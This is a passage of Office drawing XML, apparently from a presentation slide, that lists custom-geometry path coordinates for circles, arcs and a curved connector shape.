                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1802379" y="3115730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1848283" y="3108102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1893728" y="3099155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1938692" y="3088907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1983156" y="3077381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2027098" y="3064595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2070497" y="3050571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2113335" y="3035329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2155589" y="3018889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2197241" y="3001273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2238268" y="2982500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2278651" y="2962591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2318369" y="2941567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2357402" y="2919447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2395729" y="2896253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2433329" y="2872005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2470183" y="2846724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2506270" y="2820429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2541569" y="2793142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2576059" y="2764883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2609721" y="2735672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2642534" y="2705529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2674477" y="2674477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2705529" y="2642534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2735672" y="2609721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2764883" y="2576059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2793142" y="2541569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2820429" y="2506270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2846724" y="2470183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2872005" y="2433329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2896253" y="2395729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2919447" y="2357402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2941567" y="2318369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2962591" y="2278651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2982500" y="2238268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3001273" y="2197241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3018889" y="2155589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3035329" y="2113335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3050571" y="2070497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3064595" y="2027098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3077381" y="1983156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3088907" y="1938692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3099155" y="1893728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3108102" y="1848283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3115730" y="1802379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3122016" y="1756034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3126941" y="1709271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3130484" y="1662109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3132625" y="1614569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3133343" y="1566672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3132625" y="1518774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3130484" y="1471234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3126941" y="1424072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3122016" y="1377309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3115730" y="1330964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3108102" y="1285060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3099155" y="1239615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3088907" y="1194651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3077381" y="1150187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3064595" y="1106245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3050571" y="1062846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3035329" y="1020008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3018889" y="977754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3001273" y="936102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2982500" y="895075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2962591" y="854692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2941567" y="814974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2919447" y="775941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2896253" y="737614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2872005" y="700014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2846724" y="663160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2820429" y="627073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2793142" y="591774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2764883" y="557284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2735672" y="523622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2705529" y="490809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2674477" y="458866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2642534" y="427814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2609721" y="397671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2576059" y="368460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2541569" y="340201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2506270" y="312914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2470183" y="286619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2433329" y="261338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2395729" y="237090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2357402" y="213896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2318369" y="191776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2278651" y="170752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2238268" y="150843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2197241" y="132070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2155589" y="114454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2113335" y="98014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2070497" y="82772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2027098" y="68748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1983156" y="55962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1938692" y="44436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1893728" y="34188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1848283" y="25241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1802379" y="17613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1756034" y="11327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1709271" y="6402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1662109" y="2859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1614569" y="718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1566671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211321" y="3073400"/>
              <a:ext cx="2290445" cy="4551680"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2290445" h="4551680">
                  <a:moveTo>
                    <a:pt x="72136" y="4408932"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="44529" y="4415256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22256" y="4431141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7556" y="4454241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2666" y="4482211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8991" y="4509817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24876" y="4532090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47976" y="4546790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75945" y="4551680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103552" y="4545355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125825" y="4529470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140525" y="4506370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142595" y="4494530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74422" y="4494530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73660" y="4466082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142185" y="4464305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139090" y="4450794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123205" y="4428521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100105" y="4413821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72136" y="4408932"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4551680">
                  <a:moveTo>
                    <a:pt x="142185" y="4464305"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="73660" y="4466082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74422" y="4494530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142902" y="4492776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145414" y="4478401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142185" y="4464305"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4551680">
                  <a:moveTo>
                    <a:pt x="142902" y="4492776"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="74422" y="4494530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142595" y="4494530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142902" y="4492776"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4551680">
                  <a:moveTo>
                    <a:pt x="140237" y="58837"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="142748" y="73151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139502" y="87362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184403" y="88519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295655" y="96900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405256" y="110998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513206" y="130175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619125" y="154686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="723138" y="184276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="824864" y="218694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="924178" y="257937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1021206" y="301751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1115694" y="350138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1207389" y="402971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1296162" y="459866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1382140" y="520953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1464817" y="585977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1544319" y="654812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1620392" y="727455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1692910" y="803528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1761616" y="882903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1826640" y="965708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1887727" y="1051560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1944751" y="1140460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1997455" y="1232153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2045715" y="1326641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2089530" y="1423670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2128774" y="1523111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2163191" y="1624964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2192654" y="1728851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2217166" y="1834769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2236342" y="1942591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2250313" y="2052320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2258694" y="2163445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2261616" y="2276221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2258694" y="2388870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2250313" y="2499995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2236342" y="2609469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2217039" y="2717291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2192654" y="2823210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2163191" y="2926969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2128774" y="3028696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2089530" y="3128010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2045715" y="3225038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1997455" y="3319399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1944877" y="3411093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1887981" y="3499866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1826894" y="3585718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1761998" y="3668395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1693290" y="3747770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1620774" y="3823843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1544827" y="3896360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1465452" y="3965321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1382776" y="4030218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1297051" y="4091304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1208277" y="4148201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1116711" y="4201033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1022350" y="4249420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="925449" y="4293235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826007" y="4332478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724407" y="4367022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620522" y="4396613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="514730" y="4421124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407035" y="4440555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297433" y="4454525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186308" y="4463161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142185" y="4464305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145414" y="4478401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142902" y="4492776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188467" y="4491609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300989" y="4482846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411988" y="4468622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="521080" y="4448937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628395" y="4424172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733551" y="4394073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="836549" y="4359148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="937132" y="4319270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035303" y="4274820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1130935" y="4225798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1223772" y="4172330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1313561" y="4114546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1400428" y="4052697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1484122" y="3986783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1564513" y="3917061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1641475" y="3843654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1714880" y="3766566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1784477" y="3686048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1850136" y="3602228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1911985" y="3515360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1969642" y="3425317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2022855" y="3332353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2071751" y="3236849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2116201" y="3138551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2155825" y="3037840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2190623" y="2934843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2220467" y="2829560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2245232" y="2722245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2264664" y="2613152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2278761" y="2502154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2287269" y="2389504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2290064" y="2275459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2287269" y="2161286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2278633" y="2048637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2264410" y="1937639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2244979" y="1828419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2220087" y="1720977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2190368" y="1615694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2155443" y="1512570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2115566" y="1411859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2071242" y="1313561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2022220" y="1217929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968753" y="1125092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1911095" y="1035050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1849119" y="948054"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1783206" y="864235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1713483" y="783844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1640077" y="706754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1562989" y="633222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1482470" y="563499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1398651" y="497713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1311655" y="435863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221613" y="378205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1128649" y="324738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1033017" y="275716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934719" y="231394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="833881" y="191515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730885" y="156845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625475" y="126873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518160" y="102108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408939" y="82676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297814" y="68452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185165" y="59944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140237" y="58837"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4551680">
                  <a:moveTo>
                    <a:pt x="73151" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="45237" y="4891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22145" y="19605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6268" y="41915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="69596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4891" y="97492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19605" y="120554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41915" y="136425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69595" y="142748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97492" y="137856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120554" y="123142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136425" y="100832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139502" y="87362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70992" y="85598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71754" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139942" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137856" y="45255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123142" y="22193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100832" y="6322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73151" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4551680">
                  <a:moveTo>
                    <a:pt x="71754" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="70992" y="85598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139502" y="87362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142748" y="73151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140237" y="58837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71754" y="57150"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4551680">
                  <a:moveTo>
                    <a:pt x="139942" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="71754" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140237" y="58837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139942" y="5715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211573" y="327278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75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211573" y="327278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211573" y="6977634"/>
              <a:ext cx="457200" cy="459105"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="457200" h="459104">
                  <a:moveTo>
                    <a:pt x="228600" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="182533" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="229362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182533" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="458724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="229362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="466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211573" y="6977634"/>
              <a:ext cx="457200" cy="459105"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="457200" h="459104">
                  <a:moveTo>
                    <a:pt x="0" y="229362"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4644" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="101147"/>
                  </a:lnTo>
